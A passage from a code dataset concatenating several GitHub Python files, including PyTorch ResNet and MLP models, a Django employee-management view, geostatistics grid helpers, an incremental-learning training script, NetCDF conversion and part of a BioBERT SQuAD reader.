%dx%d' % (depth, k))\n nStages = [16, 16 * k, 32 * k, 64 * k]\n\n self.iconv = conv3x3(3, nStages[0])\n self.layer1 = self._wide_layer(wide_basic, nStages[1], n, dropout_rate, stride=1)\n self.layer2 = self._wide_layer(wide_basic, nStages[2], n, dropout_rate, stride=2)\n self.layer3 = self._wide_layer(wide_basic, nStages[3], n, dropout_rate, stride=2)\n self.bn = nn.BatchNorm2d(nStages[3], affine=True)\n self.linear = nn.Linear(nStages[3], num_classes, bias=True)\n\n def _wide_layer(self, block, planes, num_blocks, dropout_rate, stride):\n strides = [stride] + [1] * int(num_blocks - 1)\n layers = []\n\n for stride in strides:\n layers.append(block(self.in_planes, planes, dropout_rate, stride))\n self.in_planes = planes\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.iconv(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = F.relu(self.bn(out))\n out = F.adaptive_avg_pool2d(out, [1,1])\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n\n return out\n\n\nclass MLP(nn.Module):\n def __init__(self, input_size=784,\n hidden_sizes=[512, 256],\n n_classes=10,\n bias=True, dropout=False):\n super(MLP, self).__init__()\n\n self.dropout = dropout\n self.input_size = input_size\n self.hidden_layers = nn.ModuleList([nn.Linear(in_size, out_size, bias=bias) for\n in_size, out_size in\n zip([self.input_size] + hidden_sizes[:-1], hidden_sizes)])\n self.output_layer = nn.Linear(hidden_sizes[-1], n_classes, bias=bias)\n\n def forward(self, x):\n x = x.view(-1, self.input_size)\n out = x\n for layer in self.hidden_layers:\n Z = layer(out)\n out = F.relu(Z)\n\n if self.dropout:\n out = F.dropout(out, p=0.5)\n\n logits = self.output_layer(out)\n\n return logits\n\n\n# =====================================================\n# ResNet\nclass ResNet(nn.Module):\n def __init__(self, num_blocks, num_classes=10):\n super().__init__()\n block = BasicBlock\n self.in_planes = 64\n\n self.conv1 = nn.Conv2d(\n 3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512 * block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n in_planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(\n planes,\n planes,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(\n planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n in_planes,\n self.expansion * planes,\n kernel_size=1,\n stride=stride,\n bias=False), nn.BatchNorm2d(self.expansion * planes))\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\n\nclass JeaeunNet(nn.Module):\n def __init__(self):\n super().__init__()\n \n self.conv_1 = nn.Conv2d(\n in_channels=3, \n out_channels=9,\n kernel_size=(4,4), \n stride=2,\n padding=1\n )\n \n self.max_pool_1 = nn.MaxPool2d(\n kernel_size=(2,2),\n stride=2\n )\n \n self.conv_2 = nn.Conv2d(\n in_channels=9,\n out_channels=16,\n kernel_size=(3,3),\n stride=1,\n padding=1\n )\n self.max_pool_2 = nn.MaxPool2d(\n kernel_size=(2,2),\n stride=2\n )\n \n self.conv_3 = nn.Conv2d(\n in_channels=16,\n out_channels=32,\n kernel_size=(3,3),\n stride=1,\n padding=1\n )\n \n \n self.linear_1 = nn.Linear(\n in_features=2048,\n out_features=512\n )\n \n self.linear_2 = nn.Linear(\n in_features=512,\n out_features=512\n )\n \n self.linear_3 = nn.Linear(\n in_features=512,\n out_features=200\n )\n \n def forward(self, X):\n X = torch.relu(self.conv_1(X))\n X = self.max_pool_1(X)\n \n X = torch.relu(self.conv_2(X))\n X = self.max_pool_2(X)\n \n X = torch.relu(self.conv_3(X))\n \n X = torch.flatten(X, start_dim=1)\n \n X = torch.relu(self.linear_1(X))\n X = torch.relu(self.linear_2(X))\n X = self.linear_3(X)\n \n return X\n","repo_name":"georgeretsi/NTLR","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"71415573848","text":"from django.shortcuts import render, redirect\n\nfrom portal.forms import EmployeeForm\nfrom portal.models import Employee\n\n\ndef home(request):\n return render(request, 'portal/home.html')\n\n\ndef employee(request):\n employees = Employee.objects.all()\n\n busca = request.GET.get('search')\n if busca:\n employees = employees.filter(nome__icontains=busca)\n\n return render(request, 'portal/employee.html', {'employees': employees})\n\n\ndef employee_add(request):\n form = EmployeeForm(request.POST or None)\n\n if request.POST:\n if form.is_valid():\n form.save()\n return redirect('employee')\n\n context = {\n 'form': form\n }\n\n return render(request, 'portal/employee_add.html', context=context)\n\n\ndef employee_edit(request, employee_pk):\n employee = Employee.objects.get(pk=employee_pk)\n\n form = EmployeeForm(request.POST or None, instance=employee)\n\n if request.POST:\n if form.is_valid():\n form.save()\n return redirect('employee')\n\n context = {\n 'form': form,\n 'employee': employee\n }\n\n return render(request, 'portal/employee_edit.html', context=context)\n\n\ndef employee_delete(request, employee_pk):\n employee = Employee.objects.get(pk=employee_pk)\n employee.delete()\n\n return redirect('employee')\n","repo_name":"igoorodrigues/employees_management","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17723329217","text":"import numpy as np\nimport itertools\nimport math\n\n\n\ndef add_coords(grid):\n '''\n \n :param grid: dictionary containing the origins of a grid, number of cells and size of cells. \n \n :return: numpy ndarray dtype = int64. Each row of array represents a coordinate from the grid.\n \n '''\n xo = grid['xo']\n yo = grid['yo']\n nx = grid['nx']\n ny = grid['ny']\n sx = grid['sx']\n sy = grid['sy']\n \n x_coord = np.arange(xo, xo+(nx*sx), sx)\n y_coord = np.arange(yo, yo+(ny*sy), sy)\n\n coords_array = []\n \n \n for x, y in itertools.product(x_coord, y_coord):\n coords_array.append([x,y])\n\n return np.array(coords_array)\n\n\ndef auto_grid(x, y, sx, sy):\n '''\n \n :param x: X values from the dataset.\n \n :param y: Y values from the dataset. \n \n :param sx: X size of the grid cell to be used. \n \n :param sy: Y size of the grid cell to be used. \n \n :return: grid dictionary containing the origins of a grid, number of cells and size of cells. \n \n '''\n nx = int((x.max()-x.min())/sx)\n ny = int((y.max()-y.min())/sy)\n xo = x.min()\n yo = y.min()\n \n return {'xo':xo, 'yo':yo, 'nx':nx,'ny':ny, 'sx':sx, 'sy':sy}\n\n\n","repo_name":"joaolucasengminas/report-py-applied-geostats","sub_path":"module_grid.py","file_name":"module_grid.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37806936463","text":"from tkinter import *\r\nimport calendar\r\n\r\nroot = Tk()\r\nroot.title(\"Calendar\")\r\nroot.geometry(\"600x800\")\r\nyear = 2020\r\nmycal = calendar.calendar(year)\r\ncal_year = Label(root , text = mycal , font = \"Algerian,10,bold\").pack()\r\nroot.mainloop()","repo_name":"Pikachus-code/Turtle-Projects","sub_path":"Calendar.py","file_name":"Calendar.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6915484876","text":"import numpy as np\nimport torch\nfrom torch.cuda import amp\nfrom torch.utils.data import DataLoader\nfrom torch.nn import functional as F\nimport torch.nn as nn\n\nimport iCaRL\nfrom ResNet import resnet18_cbam\nimport torch.optim as optim\n\nimport os\n\nfrom ResNet_down import branch_resnet18_cbam\nfrom iCaRL import iCaRLmodel\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nnumclass = 20\nfeature_extractor = resnet18_cbam()\nimg_size = 32\nbatch_size = 128\ntask_size = 10\nmemory_size = 2000\nepochs = 100\nlearning_rate = 2.0\nbranch_feature_extractor = branch_resnet18_cbam()\n\nload = iCaRLmodel(numclass, feature_extractor, batch_size, task_size, memory_size, epochs, learning_rate)\nbranch_model = iCaRLmodel(10,branch_feature_extractor,batch_size,task_size,memory_size,epochs,learning_rate)\nmodel = load.model\ndownmodel = branch_model.model\n\n# split-refine-refine-C\n\nif os.path.isfile(\"temp-merge-11.pth.tar\"):\n print(\"=> loading checkpoint '{}'\".format(\"temp-merge-11.pth.tar\"))\n checkpoint = torch.load(\"temp-merge-11.pth.tar\")\n # load.cfg_mask = checkpoint['cfg_mask']\n # weight = checkpoint['weight']\n # bias = checkpoint['bias']\n # load.exemplar_set = checkpoint['exemplar_set']\n # load.class_mean_set = checkpoint['class_mean_set']\n model.load_state_dict(checkpoint['state_dict'])\n downmodel.load_state_dict(checkpoint['down_branch'], False)\nelse:\n print(\"=> no checkpoint found at '{}'\".format(\"temp-merge-11.pth.tar\"))\n\n# if os.path.isfile(\"temp-merge-1.pth.tar\"):\n# print(\"=> loading checkpoint '{}'\".format(\"temp-merge-1.pth.tar\"))\n# checkpoint = torch.load(\"temp-merge-1.pth.tar\")\n# # load.cfg_mask = checkpoint['cfg_mask']\n# # weight = checkpoint['weight']\n# # bias = checkpoint['bias']\n# # load.exemplar_set = checkpoint['exemplar_set']\n# # load.class_mean_set = checkpoint['class_mean_set']\n# model.load_state_dict(checkpoint['state_dict'])\n# downmodel.load_state_dict(checkpoint['down_branch'])\n# else:\n# print(\"=> no checkpoint found at '{}'\".format(\"temp-merge-1.pth.tar\"))\n\n# if os.path.isfile(\"temp-base.pth.tar\"):\n# print(\"=> loading checkpoint '{}'\".format(\"temp-base.pth.tar\"))\n# checkpoint = torch.load(\"temp-base.pth.tar\")\n# load.cfg_mask = checkpoint['cfg_mask']\n# weight = checkpoint['weight']\n# bias = checkpoint['bias']\n# load.exemplar_set = checkpoint['exemplar_set']\n# load.class_mean_set = checkpoint['class_mean_set']\n# model.load_state_dict(checkpoint['state_dict'])\n# else:\n# print(\"=> no checkpoint found at '{}'\".format(\"temp-base.pth.tar\"))\n\n# if os.path.isfile(\"best.pth.tar\"):\n# print(\"=> loading checkpoint '{}'\".format(\"best.pth.tar\"))\n# checkpoint = torch.load(\"best.pth.tar\")\n# # load.cfg_mask = checkpoint['cfg_mask']\n# # weight = checkpoint['weight']\n# # bias = checkpoint['bias']\n# # load.exemplar_set = checkpoint['exemplar_set']\n# # load.class_mean_set = checkpoint['class_mean_set']\n# model.load_state_dict(checkpoint['state_dict'])\n# downmodel.load_state_dict(checkpoint['down_branch'], False)\n# else:\n# print(\"=> no checkpoint found at '{}'\".format(\"best.pth.tar\"))\n\nmodel.to(device)\ndownmodel.to(device)\n\n# model.fc.weight.data = weight\n# model.fc.bias.data = bias\n\ncfg_mask = load.cfg_mask\nlayer_id_in_cfg = 0\nstart_mask = torch.ones(3)\n# end_mask = cfg_mask[layer_id_in_cfg]\n\n# cc = model.feature\n# for m0 in cc.modules():\n# if isinstance(m0, nn.BatchNorm2d):\n# bn_mask = torch.ones_like(end_mask) - end_mask\n#\n# idx0 = np.squeeze(np.argwhere(np.asarray(bn_mask.cpu().numpy())))\n# # m0.weight.data[idx0] = 0\n# # m0.bias.data[idx0] = 0\n#\n# layer_id_in_cfg += 1\n# start_mask = end_mask.clone()\n# if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC\n# end_mask = cfg_mask[layer_id_in_cfg]\n\n\ndef get_train_refine_dataloader(classes):\n load.train_dataset.getTrainData(classes, load.exemplar_set)\n\n train_loader = DataLoader(dataset=load.train_dataset,\n shuffle=True,\n batch_size=load.batchsize)\n\n return train_loader\n\n\ndef get_test_refine_dataloader(classes):\n load.test_dataset.getTestData(classes)\n\n test_loader = DataLoader(dataset=load.test_dataset,\n shuffle=True,\n batch_size=128)\n\n return test_loader\n\n\ndef get_train_and_test_dataloader(classes):\n if classes[0] == 0:\n load.exemplar_set = []\n load.train_dataset.getTrainData(classes, load.exemplar_set)\n\n load.test_dataset.getTestData(classes)\n\n train_loader = DataLoader(dataset=load.train_dataset,\n shuffle=True,\n batch_size=128)\n\n test_loader = DataLoader(dataset=load.test_dataset,\n shuffle=True,\n batch_size=128)\n\n return train_loader, test_loader\n\n\ndef beforeTrain():\n load.model.eval()\n load.model.Incremental_learning(30)\n load.model.train()\n load.model.to(device)\n\n\ndef test(): # 80.0t\n\n classes = [0, 20] # 73.5-83.8 77.4-81.9-79.65 75.9-84.9-80.4 83.35-84.0-82.69 83.75-84.3n-83.5\n # 84.4-84.2-84.60 <---> 84.55-86.19o-82.9n-0.1\n # 84.55-85.4o-83.69-0.12 84.6-84.3o-84.9n 84.75-85.0o-84.5 85.05-85.69o-84.4n 85.25-85.3o-85.2n\n _, test_loader = get_train_and_test_dataloader(classes) # 85.05-84.3o-85.8n-1.4\n\n # for name, m0 in model.named_modules():\n # if isinstance(m0, nn.Linear):\n # c = m0.weight.data.clone()\n # d = m0.bias.data.clone()\n\n model.eval()\n downmodel.eval()\n\n correct, total = 0, 0\n for step, (indexs, imgs, labels) in enumerate(test_loader):\n imgs, labels = imgs.to(device), labels.to(device)\n\n downmodel.getValue = True\n model.up_branch = True\n\n with torch.no_grad():\n # outputs = model(imgs) # outputs = (128,20)\n\n x1n, g1, x2n, g2, x3n, g3 = downmodel(imgs)\n material_from_down = [x1n, g1, x2n, g2, x3n, g3]\n _, outputs = model(imgs, material_from_down, 1)\n\n model.up_branch = False\n downmodel.getValue = False\n\n # out = model.feature_extractor(imgs) # 128,512\n\n # outputs = model.fc(out)\n # c = outputs[:, 20:].clone()\n # output_new = model.fc_new(c)\n # outputs[:, 20:] = output_new\n\n\n # outputs = load.classify(imgs)\n\n # old_predicts = load.classify(imgs)\n # outputs = model(imgs)\n # predicts = torch.max(outputs, dim=1)[1]\n # predicts[:10] = old_predicts\n\n # predicts = outputs\n\n predicts = torch.max(outputs, dim=1)[1]\n # predicts = torch.add(predicts, 10)\n\n # with torch.no_grad():\n # new_num = outputs.shape[1] - 11\n # new_index = torch.nonzero(predicts > new_num).squeeze(1)\n # new_imgs = imgs[new_index, ::]\n # outputs_new = downmodel(new_imgs)\n # predicts_new = torch.max(outputs_new, dim=1)[1]\n # new_start = int(outputs.shape[1] - 10)\n # predicts_new = torch.add(predicts_new, new_start)\n # predicts[new_index] = predicts_new\n\n # predicts = 10 + torch.max(outputs[:, 10:], dim=1)[1]\n # predicts = torch.max(outputs[:, :10], dim=1)[1]\n\n # e = np.array(np.nonzero(predicts.cpu() != labels.cpu())).squeeze().tolist()\n # pe = predicts[e]\n # la = labels[e]\n correct += (predicts.cpu() == labels.cpu()).sum()\n total += len(labels)\n accuracy = 100 * correct / total\n print(str(accuracy.item()))\n\n\ntest()\n\n\n# print(load.model)\ndef updateBN(model):\n for m in model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.weight.grad.data.add_(0.0001 * torch.sign(m.weight.data)) # L1\n\n\ndef acc_test(testloader):\n load.model.eval()\n correct, total = 0, 0\n for setp, (indexs, imgs, labels) in enumerate(testloader):\n imgs, labels = imgs.to(device), labels.to(device)\n with torch.no_grad():\n outputs = load.model(imgs)\n predicts = torch.max(outputs, dim=1)[1]\n correct += (predicts.cpu() == labels.cpu()).sum()\n total += len(labels)\n accuracy = 100 * correct / total\n load.model.train()\n return accuracy\n\n\ndef train():\n\n # beforeTrain()\n\n # optimizer\n # pg = [p for p in model.parameters() if p.requires_grad]\n # pg = [p for p in model.fc.parameters()]\n # opt = optim.SGD(pg, lr=learning_rate, weight_decay=0.00001, momentum=0.9, nesterov=True)\n opt = optim.SGD(load.model.parameters(), lr=load.learning_rate, weight_decay=0, momentum=0.9, nesterov=True)\n\n # opt = optim.SGD(load.model.parameters(), lr=learning_rate, weight_decay=0)\n classes = [10, 20]\n train_loader = get_train_refine_dataloader(classes)\n test_loader = get_test_refine_dataloader([0, 30])\n\n for epoch in range(100):\n\n if epoch == 48:\n # pg = [p for p in model.parameters() if p.requires_grad]\n for p in opt.param_groups:\n p['lr'] = learning_rate / 2.5\n elif epoch == 62:\n for p in opt.param_groups:\n p['lr'] = learning_rate / 12.5\n elif epoch == 80:\n for p in opt.param_groups:\n p['lr'] = learning_rate / 62.5\n\n for step, (indexs, images, target) in enumerate(train_loader):\n images, target = images.to(device), target.to(device)\n # new_index = torch.nonzero(target > 9).squeeze(1)\n enable_amp = True if \"cuda\" in device.type else False\n scaler = amp.GradScaler(enabled=enable_amp)\n\n if step or epoch:\n cfg_mask = load.cfg_mask\n layer_id_in_cfg = 0\n end_mask = cfg_mask[layer_id_in_cfg]\n for m0 in model.modules():\n if isinstance(m0, nn.BatchNorm2d):\n bn_mask = torch.ones_like(end_mask) - end_mask\n\n m0.weight.grad.data.mul_(bn_mask)\n m0.bias.grad.data.mul_(bn_mask)\n\n layer_id_in_cfg += 1\n if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC\n end_mask = cfg_mask[layer_id_in_cfg]\n\n\n with amp.autocast(enabled=enable_amp):\n output = load.model(images) # output = (128,10)\n target = iCaRL.get_one_hot(target, 30)\n output, target = output.to(device), target.to(device)\n loss_value = F.binary_cross_entropy_with_logits(output, target)\n\n opt.zero_grad()\n scaler.scale(loss_value).backward() # backward\n\n # updateBN(load.model.feature)\n\n # num = 20\n # load.model.fc.weight.grad.data[:num].mul_(0)\n # load.model.fc.bias.grad.data[:num].mul_(0)\n\n cfg_mask = load.cfg_mask\n layer_id_in_cfg = 0\n # skip = [7, 8, 12, 13, 17, 18]\n start_mask = torch.ones(3)\n end_mask = cfg_mask[layer_id_in_cfg]\n\n for name, m0 in model.named_modules():\n if isinstance(m0, nn.BatchNorm2d):\n layer_id_in_cfg += 1\n start_mask = end_mask.clone()\n\n if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC\n end_mask = cfg_mask[layer_id_in_cfg]\n elif isinstance(m0, nn.Conv2d):\n idx0 = np.squeeze(np.argwhere(np.asarray(start_mask.cpu().numpy())))\n idx1 = np.squeeze(np.argwhere(np.asarray(end_mask.cpu().numpy())))\n m0.weight.grad.data[:, idx0, :, :].mul_(0)\n m0.weight.grad.data[idx1, :, :, :].mul_(0)\n\n\n scaler.step(opt) # optimize\n scaler.update()\n\n if step and step % 30 == 0:\n print('epoch:%d,step:%d,loss:%.6f' % (epoch, step, loss_value.item()))\n\n end = len(train_loader) - 1\n if epoch == 99 and step == end:\n print(\"save!\")\n torch.save({\n 'state_dict': model.state_dict(),\n 'cfg_mask': load.cfg_mask,\n 'optimizer': opt.state_dict(),\n 'class_mean_set': load.class_mean_set,\n 'exemplar_set': load.exemplar_set,\n 'weight': load.weight,\n 'bias': load.bias,\n }, \"incremental-1.pth.tar\")\n accuracy = acc_test(test_loader)\n print('epoch:%d,accuracy:%.3f,' % (epoch, accuracy))\n\n\n# train()\n\n","repo_name":"Wuziyi123/SRII","sub_path":"utils/incremental.py","file_name":"incremental.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"11481286616","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\nimport os\n\n\ndef change_similary_file_path(index1, index2):\n '''\n 将找到的相似文档保存在另一个文件路径下\n index1, index2 两篇文档的索引\n :return:\n '''\n print('##############')\n documentsPath = os.path.abspath('../dataset/DocumentsForSimilarity/')\n print('待修改文件名的文档路径:', documentsPath)\n filename_list = os.listdir(documentsPath)\n newfile_dir = str(index1) + '&' + str(index2)+'\\\\'\n if not os.path.exists(documentsPath + newfile_dir):\n os.mkdir(documentsPath+ newfile_dir)\n\n # filename1 = documentsPath + filename_list[index1]\n # filename2 = documentsPath + filename_list[index2]\n # # print(filename1, filename2)\n # repath1 = documentsPath + newfile_dir + filename_list[index1]\n # repath2 = documentsPath + newfile_dir + filename_list[index2]\n # # print(repath1, repath2)\n # os.rename(filename1, repath1)\n # os.rename(filename2, repath2)\n print(filename_list[index1], '======>', filename_list[index2], '保存在:' + newfile_dir)\n\n\nif __name__ == '__main__':\n change_similary_file_path(1, 2)\n","repo_name":"ares5221/Implementation-of-Text-Classification","sub_path":"04Text-Similarity/repath_similarity_file.py","file_name":"repath_similarity_file.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"27002850057","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 26 17:18:53 2018\n\n@author: engelen\n\"\"\"\n\n\nfrom glob import glob\nimport xarray as xr\nfrom timeit import default_timer as timer\nimport numpy as np\nimport os, sys\nimport netCDF4 as nc4\n\nsys.path.append(os.path.abspath(os.path.join(os.path.abspath(__file__),'..', \"..\" ,\"imodpy\", \"imod-python\")))\n\nfrom imod import idf, util\n\n#%%\nnan_dic = {\"conc1\" : -1.,\n \"conc2\" : -1.,\n \"conc3\" : -1.,\n \"conc4\" : -1.,\n \"conc\" : -1.,\n \"constant head\" : 0.,\n \"dcdt\" : 0.,\n \"flow front face\" : 0.,\n \"flow lower face\" : 0.,\n \"flow right face\" : 0.,\n \"head\" : -9999.,\n \"head dep bounds\" : 0.,\n \"river leakage\" : 0.}\n\n#%%\nstart = timer()\n\nutil.Config.np_datetime = False\n\npath_tot = r\"g:\\3D_Nile_Delta\\jengelen.4320447\\results_2\\head_*_p004*\"\npath_out = r\"g:\\3D_Nile_Delta\\jengelen.4320447\\results_002_p{:03d}.nc\"\npath_time = r\"g:\\3D_Nile_Delta\\jengelen.4320447\\init_times.txt\"\nres_nr = 2\n\n#path_tot = sys.argv[1]\n#path_out = sys.argv[2]\n#path_time = sys.argv[3]\n#res_nr = sys.argv[4]\n\n#init_time = int(np.loadtxt(path_time)[int(res_nr)-1])\n\npaths = glob(path_tot)\n\n#%%\nds_tot = idf.loadset(path_tot, memmap = False)\n\nnan_dic = {key: nan_dic[key] for key, var in nan_dic.items() if key in ds_tot}\n\nfor key in ds_tot.keys():\n if \"subdomain\" in ds_tot[key].coords:\n subd = ds_tot[key].coords[\"subdomain\"]\n ds_tot[key] = ds_tot[key].drop(\"subdomain\")\n\npath_out = path_out.format(subd.values)\n\narb_var = key\nattrs = ds_tot[arb_var].attrs\n\nds_tot = xr.Dataset(ds_tot)\n\nds_tot.attrs = attrs\nds_tot = ds_tot.transpose(\"time\", \"layer\", \"y\", \"x\")\nds_tot = ds_tot.fillna(nan_dic)\n\n\nds_tot.time.encoding[\"units\"] = attrs[\"units\"]\n\n\nds_tot.to_netcdf(path_out, unlimited_dims = [\"time\"])\n\nsect4 = timer()\nprint(\"Done with Section 4\")\nprint(sect4-start)\n\n#%%\n#Explicitly set NetCDF units\ntestnc = nc4.Dataset(path_out, mode= 'a')\ntestnc.variables[\"time\"].setncattr(\"units\", attrs[\"units\"])\nprint(testnc.variables[\"time\"])\ntestnc.close()\n\nend = timer()\nprint(\"Done with Section 5\")\nprint(end-sect4)","repo_name":"JoerivanEngelen/Nile_Delta_post","sub_path":"process/output_to_netcdf_subdomain.py","file_name":"output_to_netcdf_subdomain.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36138208512","text":"# coding=utf-8\n# Taken from BioBERT https://github.com/dmis-lab/bioasq-biobert\n# @article{yoon2019pre,\n# title={Pre-trained Language Model for Biomedical Question Answering},\n# author={Yoon, Wonjin and Lee, Jinhyuk and Kim, Donghyeon and Jeong, Minbyul and Kang, Jaewoo},\n# journal={arXiv preprint arXiv:1909.08229},\n# year={2019}\n# }\n# @article{lee2019biobert,\n# title={BioBERT: a pre-trained biomedical language representation model for biomedical text mining},\n# author={Lee, Jinhyuk and Yoon, Wonjin and Kim, Sungdong and Kim, Donghyeon and Kim, Sunkyu and So, Chan Ho and Kang, Jaewoo},\n# doi = {10.1093/bioinformatics/btz682}, \n# journal={Bioinformatics},\n# year={2019}\n# }\n\n\"\"\"Run BERT on SQuAD 1.1 and SQuAD 2.0.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport json\nimport math\nimport os\nimport random\nfrom .modeling import (BertConfig)\nfrom .tokenization import (printable_text, whitespace_tokenize, BasicTokenizer, FullTokenizer)\nimport six\nimport tensorflow as tf\n\nclass SquadExample(object):\n \"\"\"A single training/test example for simple sequence classification.\n\n For examples without an answer, the start and end position are -1.\n \"\"\"\n\n def __init__(self,\n qas_id,\n question_text,\n doc_tokens,\n orig_answer_text=None,\n start_position=None,\n end_position=None,\n is_impossible=False):\n self.qas_id = qas_id\n self.question_text = question_text\n self.doc_tokens = doc_tokens\n self.orig_answer_text = orig_answer_text\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n def __str__(self):\n return self.__repr__()\n\n def __repr__(self):\n s = \"\"\n s += \"qas_id: %s\" % (printable_text(self.qas_id))\n s += \", question_text: %s\" % (printable_text(self.question_text))\n s += \", doc_tokens: [%s]\" % (\" \".join(self.doc_tokens))\n if self.start_position:\n s += \", start_position: %d\" % (self.start_position)\n if self.start_position:\n s += \", end_position: %d\" % (self.end_position)\n if self.start_position:\n s += \", is_impossible: %r\" % (self.is_impossible)\n return s\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self,\n unique_id,\n example_index,\n doc_span_index,\n tokens,\n token_to_orig_map,\n token_is_max_context,\n input_ids,\n input_mask,\n segment_ids,\n start_position=None,\n end_position=None,\n is_impossible=None):\n self.unique_id = unique_id\n self.example_index = example_index\n self.doc_span_index = doc_span_index\n self.tokens = tokens\n self.token_to_orig_map = token_to_orig_map\n self.token_is_max_context = token_is_max_context\n self.input_ids = input_ids\n self.input_mask = input_mask\n self.segment_ids = segment_ids\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n\ndef read_squad_examples(input_file, is_training):\n \"\"\"Read a SQuAD json file into a list of SquadExample.\"\"\"\n is_bioasq=True # for BioASQ\n\n with tf.gfile.Open(input_file, \"r\") as reader:\n #if is_bioasq:\n #input_data = [{u'paragraphs':json.load(reader)[\"questions\"], u'title':'bioASQ'}] # to fit the shape of squad code\n #else:\n input_data = json.load(reader)[\"data\"]\n\n def is_whitespace(c):\n if c == \" \" or c == \"\\t\" or c == \"\\r\" or c == \"\\n\" or ord(c) == 0x202F:\n return True\n return False\n\n examples = []\n for entry in input_data:\n for paragraph in entry[\"paragraphs\"]:\n paragraph_text = paragraph[\"context\"]\n doc_tokens = []\n char_to_word_offset = []\n prev_is_whitespace = True\n if is_bioasq:\n paragraph_text.replace('/',' ') # need review\n for c in paragraph_text:\n if is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n for qa in paragraph[\"qas\"]:\n qas_id = qa[\"id\"]\n question_text = qa[\"question\"]\n start_position = None\n end_position = None\n orig_answer_text = None\n is_impossible = False\n if is_training:\n\n if FLAGS.version_2_with_negative:\n is_impossible = qa[\"is_impossible\"]\n if (len(qa[\"answers\"]) != 1) and (not is_impossible):\n raise ValueError(\n \"For training, each question should have exactly 1 answer.\")\n if not is_impossible:\n answer = qa[\"answers\"][0]\n orig_answer_text = answer[\"text\"]\n answer_offset = answer[\"answer_start\"]\n answer_length = len(orig_answer_text)\n start_position = char_to_word_offset[answer_offset]\n end_position = char_to_word_offset[answer_offset + answer_length -\n 1]\n # Only add answers where the text can be exactly recovered from the\n # document. 